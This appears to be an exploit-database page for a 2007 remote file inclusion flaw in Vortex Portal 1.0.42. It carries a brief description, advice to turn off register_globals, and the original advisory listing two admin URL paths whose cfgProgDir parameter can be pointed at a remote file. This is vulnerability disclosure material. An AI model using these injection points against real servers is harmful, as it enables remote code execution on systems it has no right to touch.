header-logo
Suggest Exploit
vendor:
Vortex Portal
by:
ShAy6oOoN
7.5
CVSS
HIGH
RFI
98
CWE
Product Name: Vortex Portal
Affected Version From: Vortex Portal 1.0.42
Affected Version To: Vortex Portal 1.0.42
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Vortex Portal 1.0.42 RFI

The Vortex Portal 1.0.42 script is vulnerable to Remote File Inclusion (RFI) due to the presence of register_globals being turned ON. The vulnerability can be exploited by an attacker to include and execute arbitrary remote files.

Mitigation:

To mitigate the vulnerability, it is recommended to turn off register_globals in the PHP configuration or upgrade to a newer version of the script that does not have this vulnerability.
Source

Exploit-DB raw data:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~ Vortex Portal 1.0.42 RFI ~
~~~~~~~~~~~~~~~~~~~~~~~~~~~

----------
Author   : ShAy6oOoN
----------
Group    : PitBull Crew
----------
Script   : Vortex Portal 1.0.42
----------
Download : http://www.igamingcms.com/legacy-software/VortexPortal1.0.42.zip
----------
Vuln Type: RFI
----------


Register_globals: ON
-----------------

/path/admincp/auth/secure.php?cfgProgDir=

/path/admincp/auth/checklogin.php?cfgProgDir=


Greetings:
----------

PitBull Crew : The_PitBull - iNs - MaxDeMon - SancheZ - r0x00k - c0ol


Thanks To:
----------

str0ke - BiNgZa

# milw0rm.com [2007-11-04]

Navigation

Suggest Exploit

Services By CQR